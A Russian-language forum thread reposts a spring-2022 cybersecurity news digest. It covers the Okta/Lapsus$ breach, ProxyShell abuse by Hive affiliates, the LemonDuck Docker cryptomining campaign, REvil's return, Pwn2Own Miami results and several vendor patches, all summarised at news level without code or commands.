Полезные знания Обзор событий по кибербезопасности

https://top.probiv.uno/attachments/mm1234567-png.138469/

Microsoft отключила протокол обмена файлами SMBv1 по умолчанию в системах, работающих под управлением последних сборок канала Windows 11 Home Dev, последних выпусков Windows или Windows Server, которые все еще поставлялись с включенным SMBv1.

SMBv1 больше не устанавливается в ОС Microsoft по умолчанию, начиная с Windows 10 версии 1709 и Windows Server версии 1709, а более новые версии Windows используют SMBv3.

Нововведение также будет внедрено по умолчанию в следующем основном выпуске Windows 11 после того, как участники программы предварительной оценки Windows смогут протестировать и оставить отзыв об изменении.

Как пояснил специалист Microsoft, изменение не повлияет на устройства, использующие SMBv1 после обновлений на месте, поскольку администраторам по-прежнему разрешено переустанавливать его.

Пользователи, заинтересованные в отключении SMBv1 на своих серверах, могут посетить данную страницу поддержки Microsoft для получения подробных инструкций.

Microsoft рекомендует администраторам отказаться от поддержки SMBv1 в своей сети с 2016 года, поскольку он не содержит дополнительных улучшений безопасности, добавленных в более новые версии протокола SMB. Усовершенствования включают проверки целостности перед аутентификацией для предотвращения MitM-атак, шифрование, блокировку небезопасной гостевой аутентификации, защиту от атак с понижением уровня безопасности и многое другое.

Взлом систем Okta в январе нынешнего года оказался «намного менее существенным», чем считалось изначально, заявили в компании, сославшись на результаты расследования. Кибератака , в ходе которой хакеры смогли получить доступ к ноутбуку внешнего сотрудника техподдержки, продлилась всего 25 минут и затронула только двоих клиентов.

Инцидент произошел 21 января 2022 года, когда хакерская группировка Lapsus$ получила удаленный доступ к ноутбуку сотрудника техподдержки компании Sitel. Об утечке стало известно лишь 22 марта после появления соответствующего заявления Lapsus$.

Как показали окончательные результаты расследования, проведенного неназванной «ИБ-компанией с мировым именем», в течение 25 минут у хакеров был доступ к единственной рабочей станции инженера Sitel с доступом к ресурсам Okta. За это время они добрались лишь до двух активных клиентов в приложении SuperUser. Злоумышленникам также удалось просмотреть ограниченный объем дополнительной информации в приложениях Slack и Jira, которую нельзя использовать во вред клиентам, уверяет Okta.

Хакеры не смогли внести какие-либо изменения в конфигурацию, сбросить пароли, выдать себя за сотрудников Okta или авторизоваться в корпоративных учетных записях.

После публикации заявления Lapsus$ о взломе 22 марта Okta сообщила, что он затронул 366 клиентов. Сразу же возник вопрос, почему же компания не уведомила их об этом раньше? Примерно через неделю Okta пояснила, что не предупредила клиентов, поскольку «не знала масштабов проблемы в Sitel» и не подозревала о каком-либо риске для себя и своих клиентов.

CISA потребовало от агентств Федеральной гражданской исполнительной власти исправить проблему до 10 мая 2022 года.
image


Агентство кибербезопасности и безопасности инфраструктуры США (Cybersecurity and Infrastructure Security Agency, CISA) предупредило, что уязвимость в компоненте службе печати Windows Print Spooler, исправленная Microsoft в феврале нынешнего года, активно эксплуатируется хакерами в реальных атаках.

Проблема (CVE-2022-22718) получила оценку в 7,8 балла по шкале CVSS и является одной из четырех уязвимостей повышения привилегий в службе печати, которые Microsoft устранила 8 февраля 2022 года.

CISA также добавило CVE-2022-22718 в свой список известных эксплуатируемых уязвимостей, требуя от агентств Федеральной гражданской исполнительной власти (FCB исправить проблемы до 10 мая 2022 года.

Самым популярным средством атаки киберпреступников остается бэкдор Beacon.
image


Продолжительность времени, в течение которого злоумышленники остаются незамеченными в сети жертвы, сокращается четвертый год подряд — до 21 дня в 2021 году по сравнению с 24 днями в 2020 году. Программы-вымогатели обнаруживались в среднем в течение пяти дней, тогда как прочие атаки оставались незамеченными в течение 36 дней в 2021 году по сравнению с 45 днями в 2020 году.

Однако в целом ситуация становится лучше, поскольку все больше компаний сотрудничают со сторонними фирмами, занимающимися кибербезопасностью, а государственные учреждения и ИБ-компании часто уведомляют жертв об атаках, что приводит к более быстрому обнаружению.

Согласно Mandiant M-Trends 2022, компании значительно улучшили время обнаружения киберугроз за последнее десятилетие, сократив его почти в 20 раз (с 418 дней в 2011 году до 21 дня в 2021 году). Улучшение возможностей компаний по обнаружению киберугроз значительно различалось в зависимости от региона — компании в Азиатско-Тихоокеанском регионе столкнулись с резким сокращением так называемого «времени ожидания» до 21 дня в 2021 году по сравнению с 76 днями в 2020 году. В европейских компаниях также наблюдалось значительное снижение до 48 дней с 66 дней в 2020 году, в то время как обнаружение киберугроз североамериканскими компаниями не изменилось и осталось на уровне 17 дней.

Самым популярным средством атаки киберпреступников остается бэкдор Beacon, на долю которого пришлось 28% всех выявленных видов вредоносных программ. Beacon является компонентом инструмента Cobalt Strike, который также популярен среди злоумышленников.

По словам экспертов, на использование уязвимостей и атаки через цепочку поставок приходится 54% всех атак с выявленным первоначальным вектором заражения в 2021 году, по сравнению с менее чем 30% атак в 2020 году.

Другая тенденция заключается в том, что злоумышленники все чаще нацеливаются на гибридные установки Active Directory (AD), поскольку неправильные настройки в гибридной модели идентификации, когда учетные данные и ключи синхронизируются между локальными службами AD и Azure Active Directory в облаке, приводят к повышенному риску компрометации.

В результате кибератаки временно недоступными стали три крупнейших сайта – Israel TV Channel 9, Channel 11 и Channel 3.
image


В ночь на среду, 20 апреля, иракские хакеры атаковали целый ряд израильских СМИ, в том числе официальную телевизионную сеть. В результате кибератаки временно недоступными стали три крупнейших сайта – Israel TV Channel 9, Channel 11 и Channel 3.

«Этой ночью шиитские хакеры из Ирака устроили атаку на ряд израильских сайтов, включая 9tv.co.il. Атака заключалась в "бомбардировке запросами", которая создает критическую нагрузку на сервер и приводит к его отключению (так называемый DDoS)», – сообщается на сайте Israel TV Channel 9.

Кибератака была приурочена ко «времени гибели Касема Сулеймани», то есть к часу ночи и стала ответом на ликвидацию американцами иракского командующего подразделением «Кудс». Ответственность за атаки взяла на себя киберпреступная группировка Fariq al-Tahereh. В настоящее время атакованные сайты работают в обычном режиме.

Группировка проводит операции по кибершпионажу в отношении украинских правительственных организаций как минимум с 2014 года.
image


Специалисты ИБ-компании Symantec сообщили об атаках киберпреступной группировки Shuckworm (Armageddon или Gamaredon) на украинские организации с использованием нового варианта кастомного бэкдора Pteredo (Pteranodon).

Группировка, связываемая специалистами с Россией, проводит операции по кибершпионажу в отношении украинских правительственных организаций как минимум с 2014 года. По подсчетам специалистов, она осуществила более 5 тыс. кибератак на 1,5 тыс. общественных и частных предприятий в стране.

Pteredo берет свое начало на хакерских форумах, где в 2016 году его приобрела группировка Shuckworm. Хакеры стали активно разрабатывать бэкдор, добавляя в него DLL- модули для похищения данных, удаленного доступа и анализа проникновения.

Помимо Pteredo в недавних атаках Shuckworm также использовала инструмент для удаленного доступа UltraVNC и Microsoft Process Explorer для обработки процессов DLL-модулей.

Если сравнить атаки Shuckworm на украинские организации с января 2022 года, то можно прийти к выводу, что группировка практически не изменила свои тактики. В предыдущих атаках варианты Pteredo загружались на атакуемые системы с помощью файлов VBS, спрятанных внутри документа, прилагающегося к фишинговому письму. Файлы 7-Zip разархивируются автоматически, что минимизирует взаимодействие с пользователем (эти же файлы использовались и в январских атаках).

Хотя Shuckworm является высокопрофессиональной группировкой, ее инструментарий и тактики заражения не усовершенствовались за последние несколько месяцев, что облегчило ее обнаружение и упростило методы защиты.

В настоящее время Pteredo все еще активно разрабатывается, а значит, хакеры могут работать над более продвинутой, мощной и не поддающейся детектированию версией бэкдора, а также модифицировать свою цепочку атаки.
 
Последнее редактирование:
Positive Technologies анонсировала PT Cybersecurity Suite (PT ICS)

Платформа обеспечивает защиту промышленности от киберугроз.

image



Positive Technologies анонсировала платформу для защиты промышленности от киберугроз — PT Industrial Cybersecurity Suite (PT ICS) . Платформа объединяет в себе новые возможности для защиты АСУ ТП — обнаруживает целевые атаки на всех уровнях промышленной IT-инфраструктуры и блокирует действия злоумышленников на конечных точках в промышленных средах.

IT-инфраструктура современного предприятия состоит из двух сегментов: корпоративного и технологического. Исследования Positive Technologies по анализу защищенности промышленных организаций показывают, что уровень безопасности сегмента АСУ ТП, как правило, низок. Основными киберугрозами для промышленных компаний сегодня являются атаки APT-группировок и хактивистов.

«Бóльшая часть усилий промышленных предприятий по повышению своей защищенности фокусируется на корпоративных инфраструктурах. В то же время регулярно появляющиеся в СМИ истории про кибератаки на АСУ ТП говорят о низкой защищенности технологических систем, а также о том, что именно их безопасность во многом определяет уровень общей ИБ предприятий, — рассказывает Роман Краснов, руководитель направления промышленной кибербезопасности Positive Technologies.Обеспечение безопасности производственных предприятий требует единого, сквозного подхода. Необходимо организовать защиту, начиная от периметра корпоративной сети и до конечных устройств систем автоматизации, а также применить единый арсенал современных средств защиты и мониторинга. Все эти инструменты решения задач в себе объединил PT ICS».

Компоненты платформы PT ICS размещаются как в АСУ ТП, так и за ее пределами. Все они располагают необходимой экспертизой для выявления киберугроз, специфичных для индустриального сегмента. PT ICS объединяет ключевые продукты Positive Technologies и их компоненты, отвечающие за безопасность технологических систем, в частности:
  • Новые промышленные агенты MaxPatrol SIEM собирают информацию с узлов технологической сети, а специализированные правила нормализации и корреляции событий для популярных АСУ ТП различных производителей доступны «из коробки»;
  • Сенсоры PT ISIM , адаптированные под АСУ ТП, отвечают за глубокий анализ трафика технологических сетей, выявление в них аномалий и помогают осуществлять проактивный поиск угроз (threat hunting);
  • Новые промышленные агенты MaxPatrol VM позволяют безопасно сканировать технологическую сеть, проводить аудит ПО и аппаратных средств популярных зарубежных и отечественных производителей;
  • Специализированные возможности PT Sandbox помогают динамически выявлять вредоносное ПО, целью которого являются технологические системы различных производителей;
За счет новых возможностей, учитывающих особенности автоматизированных систем управления, продукты Positive Technologies, которые легли в основу платформы PT ICS, эффективно обнаруживают действия хакеров в промышленных сегментах и обеспечивают сквозную защиту всей технологической инфраструктуры, включая сети передачи данных, конечные узлы и специализированные устройства.

Платформа помогает:
  • контролировать целостность технологической инфраструктуры;
  • анализировать состояние безопасности узлов сети АСУ ТП;
  • анализировать трафик в технологических сетях АСУ ТП;
  • выявлять вредоносное ПО, нацеленное на компоненты АСУ ТП;
  • своевременно реагировать на киберугрозы и блокировать их.
Компании, которые уже используют такие продукты Positive Technologies, как MaxPatrol SIEM, MaxPatrol VM или PT Sandbox, могут посредством PT ICS распространить защиту и на технологический сегмент. Таким образом, они получат знакомый инструментарий, дополненный технологической экспертизой, что, в свою очередь, повысит эффективность работы служб ИБ и снизит затраты на эксплуатацию систем кибербезопасности.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Принадлежащие кибервымогательской группировке REvil серверы в сети Tor возобновили работу после нескольких месяцев простоя и теперь переадресовывают посетителей на новую кибервымогательскую операцию, начавшуюся в середине декабря прошлого года.

Кто стоит за новой операцией, неизвестно, однако в списке жертв на новом сайте утечек числятся прошлые жертвы REvil.

Несколько дней назад исследователи безопасности pancak3 и Суфиан Тахири (Soufiane Tahiri) обнаружили на русскоязычном форуме RuTOR рекламу нового сайта утечек REvil. Ресурс размещен на другом домене, но ведет на оригинальный сайт группировки, которым она пользовалась, когда была активной.

В январе 2022 года, вскоре после ареста 14 предполагаемых участников REvil в России, исследователь MalwareHunterTeam сообщил, что в середине декабря 2021 года была зафиксирована активность новой группировки, связанной с REvil, но что это за связи, он не уточнил. В период с 5 по 10 апреля он заметил, что текущий связанный с группировкой сайт работает, но на нем нет никакого контента. Примерно через неделю контент начал появляться.

MalwareHunterTeam также обнаружил в источнике RSS строку Corp Leaks, ранее использовавшуюся ныне нефункционирующей кибервымогательской группировкой Nefilim.

Блог и сайт для уплаты выкупа развернуты на разных серверах. Блог загружает cookie-файл DEADBEEF – компьютерный термин, которым пользовались кибервымогатели TeslaCrypt для создания файлов.

Кто стоит за новой операцией с применением серверов REvil, пока установить нельзя. Исследователям еще предстоит проанализировать связанную с REvil полезную нагрузку, а сама группировка пока не сообщает ничего, что могло бы пролить свет на ее происхождение.

Партнер программы-вымогателя Hive атаковал серверы Microsoft Exchange, содержащие уязвимости ProxyShell, для установки различных бэкдоров, включая маячки Cobalt Strike. Злоумышленники проводят сетевую разведку, крадут учетные данные учетной записи администратора, похищают ценную информацию и в конечном итоге устанавливают вымогательское ПО для шифрования файлов.

ProxyShell — набор из трех уязвимостей в Microsoft Exchange Server, которые позволяют удаленно выполнять код без проверки подлинности в уязвимых средах. После того как эксплоиты стали доступны, уязвимости использовались несколькими злоумышленниками, включая вымогательские группировки Conti, BlackByte, Babuk, Cuba и LockFile.

Уязвимости (CVE-2021-34473, CVE-2021-34523 и CVE-2021-31297) получили оценку от 7,2 до 9,8 из максимальных 10 по шкале CVSS и были исправлены в мае 2021 года.

После эксплуатации ProxyShell хакеры внедрили четыре web-оболочки в доступную директорию Exchange и выполнили PowerShell-код с высокими привилегиями для загрузки Cobalt Strike. Web-оболочки были получены из общедоступного репозитория Git и были переименованы с целью избежать обнаружения во время возможных проверок.

Затем злоумышленники использовали Mimikatz для кражи пароля учетной записи администратора домена и выполнения перемещения по сети, получив доступ к большему количеству ресурсов. Хакеры инициировали обширные операции по поиску более ценных файлов, чтобы заставить жертву заплатить крупный выкуп.

Аналитики из компании Varonis обнаружили следы установленных сетевых сканеров, списки IP-адресов, перечисления устройств и каталогов, RDP для резервных серверов, сканирования баз данных SQL и пр. Одним из заметных случаев злоупотребления программным обеспечением для сканирования сети был инструмент SoftPerfect, который злоумышленники использовали для перечисления активных систем, проверяя их связь и сохраняя результаты в текстовом файле. После того как все файлы были похищены, полезная нагрузка программы-вымогателя с именем Windows.exe была запущена на нескольких устройствах.

Перед шифрованием файлов организации полезная нагрузка, написанная на языке Golang, удалила теневые копии, отключила Защитник Windows, очистила журналы событий Windows, отключила процессы привязки файлов и остановила работу диспетчера учетных записей безопасности.

С 2015 года Секретная служба США (подчиняется Министерству внутренней безопасности) 254 раза проводила конфискации криптовалютных активов на общую сумму в $102 млн. Конфискованные средства были украдены злоумышленниками в виде криптовалюты, либо конвертированы в цифровые активы после кражи. Об этом сообщает "Коммерсант".

"Отслеживание цифрового кошелька не сильно отличается от адреса электронной почты. Он тоже связан с отправителями и адресатами. Когда кто-то проводит транзакцию с помощью этого кошелька мы получаем возможность его обнаружить, проследив за ним в блокчейне", — объяснил заместитель директора службы по расследованиям Дэвид Смит.

Как сообщается, конфискации, в частности, проводились в рамках расследования, проведенного в сотрудничестве национальной полицией Румынии. В этой стране злоумышленники создали фиктивные сайты по продаже люксовых товаров, а также проводили онлайн-аукционы. Пострадали 900 граждан из США, их средства были конвертированы в криптовалюту.

Google запустила свой протокол Accelerated Mobile Page (AMP) еще в 2015 году и пообещала, что технология обеспечит более быстрый интернет-серфинг на портативных устройствах. Однако со временем AMP стал меньше зависеть от скорости и начал передавать большое количество пользовательских данных поисковому гиганту.

В связи с этим специалисты в области конфиденциальности в Brave и DuckDuckGo объявили о двух отдельных инициативах, призванных защитить пользователей от дополнительного отслеживания, внедренного Google на web-страницах с поддержкой AMP. Новая функция Brave под названием De-AMP будет включена по умолчанию в версиях одноименного браузера для компьютеров и устройств под управлением Android. Вскоре после данной новости поисковая система DuckDuckGo сообщила в Twitter, что все ее приложения и расширения также будут защищать от отслеживания AMP.

«Google использует AMP для дальнейшего укрепления своей монополии, навязывая технологию издателям, отдавая приоритет ссылкам AMP в поиске и отдавая предпочтение рекламе Google на страницах AMP», — написал представитель DuckDuckGo.

Как пояснили в DuckDuckGo, когда пользователь загружает страницу с поддержкой Google AMP с помощью приложения DuckDuckGo или расширения для браузера, «вместо версии Google AMP будет использоваться исходная web-страница издателя».

Brave предложил более четкое представление о том, как должен работать De-AMP. Браузер будет «переписывать ссылки и URL-адреса», чтобы пользователи вообще не попадали на эти версии страниц, предоставленные Google. Brave будет просматривать web-страницы на предмет потенциального рендеринга AMP-кода на месте. В случае обнаружения этого он прекратит загрузку текущей страницы и перенаправит пользователей на «настоящую» версию сайта до того, как страница будет загружена.

Специалист ИБ-компании Claroty Ури Катц (Uri Katz) опубликовал подробности о теперь уже исправленной уязвимости в системе обнаружения и предотвращения вторжений Snort, позволяющей вызывать отказ в обслуживании (DoS) и делать систему бесполезной для отражения вредоносного трафика.

Уязвимость CVE-2022-20685 получила 7,5 балла из 10 по шкале оценивания опасности. Проблема присутствует в препроцессоре Modbus движка обнаружения Snort и затрагивает все релизы системы до версии 2.9.19, а также версию 3.1.11.0.

Поддерживаемая компанией Cisco система обнаружения (IDS) и предотвращения вторжений (IPS) с открытым исходным кодом Snort анализирует сетевой трафик в режиме реального времени в поисках признаков возможной вредоносной активности на основе заранее заданных правил.

CVE-2022-20685 представляет собой уязвимость целочисленного переполнения (integer-overflow). С ее помощью злоумышленник может сделать так, чтобы Snort перестала обрабатывать новые пакеты и генерировать уведомления безопасности.

Проблема связана с тем, как Snort обрабатывает пакеты Modbus (промышленный протокол передачи данных, использующийся в SCADA-сетях). Злоумышленник может отправить уязвимому устройству особым образом сконфигурированный пакет и вызвать «зависание» процессов Snort.

«Успешная эксплуатация уязвимостей в инструментах для анализа сетей наподобие Snort может разрушительно воздействовать на корпоративные и OT-сети. Инструменты для анализа сетей представляют собой недостаточно исследуемую область, которую следует лучше анализировать и которой нужно уделять больше внимания, в особенности потому, что OT-сети централизовано управляются аналитиками IT-сетей, знакомыми с Snort и другими подобными инструментами», - сообщил Катц.

Правительственный совет Коста-Рики 19 постановил создать группу для постоянного мониторинга кибератак после того, как хакеры из группы Conti атаковали сервера министерства финансов. Об этом сообщает новостное агентство Prensa Latina.

В ночь на 18 апреля киберпреступники атаковали сервера министерства финансов и науки, инноваций, технологий и телекоммуникаций Коста-Рики. Некоторые из государственных цифровых платформ были заражены вымогательским ПО Conti. В руки хакеров попали более терабайта баз данных, переписок и внутренних документов.

Сразу после атаки Conti опубликовали заявление, в котором пообещали раскрыть «тайны министерства», так как «министр не может сам объяснить налогоплательщикам, что происходит».

В обмен на молчание хакеры потребовали у правительства 10 миллионов долларов.

«Мы продолжим атаковать министерства Коста-Рики. Пока правительство не заплатит нам, атака будет продолжаться. Начинаем публиковать внутренние документы, базу налогоплательщиков оставим на потом», - говорится в заявлении хакеров Conti.

Власти Коста-Рики сделали официальное заявление, что исключают какие-либо платежи преступной группировке Conti за возврат файлов, захваченных в результате кибератак.

Шесть крупных компаний, занимающихся виртуальными частными сетями, устанавливают корневые сертификаты, которые могут использованы злоумышленниками для наблюдения за пользователями.

VPN предназначены для защиты пользователей, направляя все данные через доверенную службу, которая шифрует личную информацию. Однако, по результатам AppEsteem стало известно, что шесть самых известных VPN-сервисов (Surfshark, Atlas VPN, VyprVPN, VPN Proxy Master, Sumrando VPN и Turbo VPN) делают это крайне опасным образом. Каждая из служб устанавливает доверенный корневой центр сертификации на устройствах пользователей, подвергая их конфиденциальность опасности.

Установка доверенных корневых сертификатов не является хорошей практикой. Если сертификат будет скомпрометирован, злоумышленник сможет подделать больше сертификатов, выдать себя за другие домены и перехватить сообщения пользователей.

Это означает, что даже если пользователь использует службу, которая сама зашифрована, VPN-провайдер и киберпреступники могут перезаписать это шифрование и перехватить все данные.

Представитель Surfshark сообщил, что данная проблема была решена, хотя и касается только систем под управлением Windows.
 
Последнее редактирование:
MM1234567.png

Хакеры, ответственные за недавний взлом проекта DeFi Zeed, похоже, забыли забрать украденные средства после атаки.

Протокол кредитования DeFi Zeed был атакован киберпреступниками, которым удалось похитить средства, воспользовавшись уязвимостью в коде. Взлом привел к тому, что цена криптовалюты YEED упала до нуля, а хакер получил прибыль в размере $1 млн.

Специалисты компании по блокчейн-безопасности PeckShield сообщили, что злоумышленники не перевели средства после атаки, прежде чем вызвать функцию «самоуничтожения» скомпрометированного смарт-контракта. Таким образом, украденная криптовалюта навсегда и необратимо пропала.

Взломы DeFi-протоколов — далеко не новое явление в криптопространстве. Ранее протокол Beanstalk, ориентированной на кредитование стабильной монеты, построенный на Ethereum, был взломан . Протокол потерял около $182 млн в различных криптоактивах. Злоумышленники украли более $80 млн в криптовалютах, в том числе 24 830 ETH (около $75 млн).

Специалисты из канадской компании eSentire сообщили о новой волне фишинговых атак с использованием вредоносного ПО more_eggs. Киберпреступники атаковали корпоративных менеджеров по подбору персонала с помощью поддельных резюме.

«В этом году операция more_eggs изменила сценарий социальной инженерии, нацелившись на менеджеров по подбору персонала с помощью поддельного резюме, вместо соискателей с поддельными предложениями о работе», — отметили эксперты.

Исследователи в области кибербезопасности выявили и предотвратила четыре отдельных киберинцидента, три из которых случились в конце марта нынешнего года. Затронутые организации включают базирующуюся в США аэрокосмическую компанию, бухгалтерское предприятие, расположенное в Великобритании, а также юридическую фирму и кадровое агентство, расположенные за пределами Канады.

Вредоносное ПО, предположительно разработанное группировкой Golden Chickens (также известной как Venom Spider), представляет собой незаметный модульный набор бэкдоров, способный похищать ценную информацию и осуществлять перемещение по скомпрометированной сети.

Анонимная криптовалюта Monero набирает популярность у кибервымогателей, сообщает недавно приобретенная Mastercard компания CipherTrace.

Согласно новому отчету компании за 2021 год, кибервымогательские группировки все чаще стали требовать у своих жертв выкуп в Monero (XMR), а за платежи в биткойнах запрашивают дополнительные 10-20%.

Анонимные монеты представляют собой криптовалюту, которая ставит полную анонимность участников транзакций выше удобства в использовании. Они являются альтернативой биткойну, чьи транзакции записываются в блокчейн, который может просмотреть кто угодно и который нельзя изменить.

«Вымогательское ПО в основном рассматривается как проблема криминальная, однако вскоре она может стать проблемой геополитической. Я использую теорию игр для изучения программ-вымогателей, а также изучаю, как такие страны, как Северная Корея, используют киберинструменты для достижения стратегических целей. Мои исследования показывают, что использование шифрования для геополитических целей – лишь вопрос времени. Это облегчит мелким и бедным игрокам получение уступок от более сильных противников», – сообщала в прошлом году эксперт по санкциям в отношении КНДР Дженни Джун в статье Politico.

Этими игроками необязательно должны быть государства. С помощью анонимных монет путем шантажа уступок смогут добиваться, например, террористы, отказываясь расшифровывать данные, если не будут отпущены заключенные.

Еще один тренд – двойное вымогательство, которое специалисты CipherTrace назвали «новой тревожной тенденцией в продолжающейся эволюции вымогательского ПО». В таких атаках не только шифруются данные, но вымогатели также угрожают раскрыть их, если жертва не заплатит выкуп. Лидер в этой области Monero не позволяет пользователям включать и выключать конфиденциальность, в отличие от главных конкурентов Dash (DASH) и Zcash (ZEC).

В настоящее время рыночная капитализация Monero составляет $4,8 млрд.

Среди инструментов, использующихся Monero для обеспечения анонимности участников транзакций, — кольцевые подписи, скрытые адреса и кольцевые конфиденциальные транзакции. Кольцевые подписи группируют средства пользователей вместе, поэтому определить, кто из участников совершил транзакцию, невозможно. Скрытые адреса – случайные, одноразовые адреса, создаваемые во время каждой транзакции, скрывающие истинный адрес кошелька как отправителя, так и получателя.

Исследователи безопасности компании Check Point рассказали об уязвимости, позволяющей хакерам захватить контроль над миллионами Android-устройств с мобильными чипсетами Qualcomm и MediaTek.

Уязвимость присутствует в ALAC (Apple Lossless Audio Codec или Apple Lossless) – аудиоформате, представленном компанией Apple в 2004 году и позволяющем предоставлять аудио в формате lossless через интернет. Хотя с тех пор Apple обновляла свою первоначальную версию декодера, исправляя уязвимости, версия с открытым исходным кодом, которой пользуются Qualcomm и MediaTek, не обновлялась с 2011 года.

Уязвимость представляет собой чтение данных за пределами выделенной области памяти и позволяет злоумышленникам выполнить вредоносный код на устройстве с помощью вредоносного аудиофайла, что в других условиях было бы невозможно.

Специалисты Check Point сослались на исследователя, заявившего, что атакам подвержены две трети смартфонов, проданных в 2021 году, если они не получили обновлений.

Уязвимость в ALAC (CVE-2021-30351 в классификации Qualcomm и CVE-2021-0674/CVE-2021-0675 в классификации MediaTek) также может быть проэксплуатирована Android-приложением без привилегий для получения привилегий системы и доступа к медиаданным и микрофону.

Обе компании передали свои патчи Google и производителям смартфонов в прошлом году, которые в свою очередь разослали их затронутым пользователям в декабре. Проверить, уязвимо ли Android-устройство, можно в настройках ОС. Если последние патчи были применены в декабре 2021 года или позднее, устройство не подвержено уязвимости. Однако многие смартфоны до сих пор не получили обновлений и могут подвергаться опасности.

Специалисты Check Point представят технические подробности об уязвимости в следующем месяце на конференции CanSecWest в Ванкувере.

API-интерфейсы Docker на Linux-серверах стали мишенью крупномасштабной кампании по добыче криптовалюты Monero со стороны операторов ботнета LemonDuck.

Как сообщили специалисты из компании Crowdstrike, LemonDuck получает доступ к открытым API-интерфейсам Docker и запускает вредоносный контейнер для получения Bash-скрипта, замаскированного под изображение PNG. Полезная нагрузка создает задание cronjob в контейнере для загрузки файла Bash (a.asp), который выполняет следующие действия:
  • Отключает процессы на основе названий известных пулов майнинга, конкурирующих группировок криптомайнинга и пр.
  • Отключает демонов, таких как crond, sshd и syslog.
  • Удаляет известные пути к файлам индикатора компрометации.
  • Отключает сетевые подключения к командному серверу конкурирующих групп криптомайнинга.
  • Отключает службу мониторинга Alibaba Cloud, которая защищает экземпляры от опасных действий.

После выполнения описанных выше действий Bash-скрипт загружает и запускает утилиту криптомайнинга XMRig вместе с файлом конфигурации, который скрывает кошельки злоумышленников за пулами прокси.

После того, как зараженная система была настроена для майнинга, LemonDuck пытается перемещаться по сети с помощью SSH-ключей, найденных в файловой системе. Если они доступны, злоумышленник использует их для повторения того же процесса заражения.

Исследователи безопасности получили вознаграждение в размере $400 тыс. за обнаружение 26 ранее неизвестных уязвимостей в АСУ ТП и SCADA-системах в рамках хакерских соревнований Pwn2Own Miami 2022, проходивших 19-21 апреля.

В ходе мероприятия исследователи атаковали различные категории продуктов, в том числе серверы управления, серверы OPC UA, шлюзы данных и человеко-машинные интерфейсы.

После обнаружения уязвимостей в рамках Pwn2Own о них сообщается производителям, которым дается 120 дней на исправление, а затем Trend Micro Zero Day Initiative (ZDI) выкладывает данные об уязвимостях в открытый доступ.

Победителями Pwn2Own Miami 2022 стали Даан Кеупер (Daan Keuper), также известный как @daankeuper, и Тхийс Алкемаде (Thijs Alkemade), также известный как @xnyhps, из подразделения Sector 7 нидерландской IT-компании Computest.

В первый день победители получили $20 тыс. за выполнение кода на сервере управления Inductive Automation Ignition SCADA через уязвимость отсутствия механизма аутентификации. Кроме того, с помощью уязвимости неконтролируемого пути поиска исследователи удаленно выполнили код в AVEVA Edge HMI/SCADA, за что тоже получили награду в размере $20 тыс.

На второй день команда Computest Sector 7 проэксплуатировала уязвимость отказа в обслуживании в Unified Automation C++ Demo Server и завоевала $5 тыс. Исследователям также удалось обойти проверку доверенности приложений в OPC Foundation OPC UA .NET Standard, благодаря чему сумма их вознаграждения увеличилась еще на $40 тыс.

За три дня соревнований команда заработала $90 тыс. и завоевала титул Master of Pwn («Магистр взлома»).

BlackCat является первой кибервымогательской группировкой, которой удалось добиться больших успехов с RUST.

В период с ноября 2021-го по март 2022 года кибервымогательская группировка Black Cat (она же ALPHV), взломала сети как минимум 60 организаций по всему миру. Об этом сообщается в совместном уведомлении киберподразделения ФБР и Агентства кибербезопасности и безопасности инфраструктуры (Cybersecurity and Infrastructure Security Agency, CISA), опубликованном в среду, 20 апреля.

Уведомление входит в серию аналогичных отчетов, посвященных тактикам, техникам и процедурам, а также индикаторам компрометации (IOC) вымогательского ПО, выявленного ФБР в ходе расследований. Так, с начала года ФБР выпустило уведомления касательно таких кибервымогательских группировок, как BlackByte, Ragnar Locker и Avoslocker, взломавших десятки организаций критической инфраструктуры в США.

BlackCat/ALPHV является «первой кибервымогательской группировкой, которой удалось добиться больших успехов с RUST, считающимся более безопасным языком программирования и обеспечивающим улучшенную производительность и надежность параллельной обработки», говорится в уведомлении ФБР.

Исполняемый файл вымогательского ПО BlackCat очень легко кастомизировать. Кроме того, он поддерживает множество методов шифрования и опций, благодаря которым атаки можно легко адаптировать под любую корпоративную среду.

Бюро рекомендует системным администраторам, обнаружившим активность BlackCat в сетях своих компаний, передать соответствующую информацию киберподразделению ФБР.

Полезная информация, которая позволила бы отследить активность группировки, включает «реестры IP, отображающие обратные вызовы иностранных IP-адресов, Bitcoin- и Monero-адреса и идентификаторы транзакций, коммуникации со злоумышленниками, файл декриптора и/или незашифрованную версию зашифрованного файла».

ФБР не рекомендует платить выкуп BlackCat, поскольку нет никаких гарантий, что это обезопасит жертву от дальнейших кибератак или публикации похищенных у нее данных. Тем не менее, бюро известно, что ущерб от атак кибервымогателей может быть весьма существенным, и это может подтолкнуть компании к уплате выкупа.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Их эксплуатация позволяет вызвать состояние отказа в обслуживании и перехватить контроль над уязвимыми системами.
image


Специалисты компании Cisco выпустили обновления для устранения трех опасных уязвимостей в своих продуктах. Их эксплуатация позволяет вызвать состояние отказа в обслуживании (DoS) и перехватить контроль над уязвимыми системами.

Первая из трех уязвимостей (CVE-2022-20783) получила оценку в 7,5 балла по шкале CVSS и затрагивает ПО Cisco TelePresence Collaboration Endpoint и ПО Cisco RoomOS. Проблема связана с отсутствием надлежащей проверки входных данных, что позволяет удаленному неавторизованному злоумышленнику отправлять специально сформированный трафик на устройства. Проблема устранена в версиях ПО Cisco TelePresence CE 9.15.10.8 и 10.11.2.2.

Вторая уязвимость CVE-2022-20773 (оценку в 7,5 балла по шкале CVSS) связана со статическим SSH-ключом в виртуальном устройстве Cisco Umbrella (VA) с версией программного обеспечения старше 3.3.2. Проблема потенциально позволяет злоумышленнику выполнить MitM-атаку на SSH-соединение и получить учетные данные администратора.

Третья уязвимость связана с повышением привилегий в Cisco Virtualized Infrastructure Manager (CVE-2022-20732) и получила оценку в 7,8 балла по шкале CVSS. Проблема позволяет локальному авторизованному злоумышленнику повышать привилегии на устройствах. Уязвимость была исправлена в версии программного обеспечения 4.2.2.

В настоящее время QNAP изучает эти уязвимости и готовится вскоре выпустить исправления.
image


Компания QNAP призвала своих пользователей принять меры по блокировке потенциальных атак через уязвимости в Apache HTTP Server, затрагивающие ее сетевые накопители NAS.

Уязвимости CVE-2022-22721 и CVE-2022-23943 обозначены как критические и получили оценки 9,8 и 10 баллов из 10 по шкале оценивания опасности. Проблемы присутствуют в версии Apache HTTP Server 2.4.52 и более ранних.

Как сообщают специалисты NVD, неавторизованный злоумышленник может проэксплуатировать уязвимости удаленно без взаимодействия с пользователем.

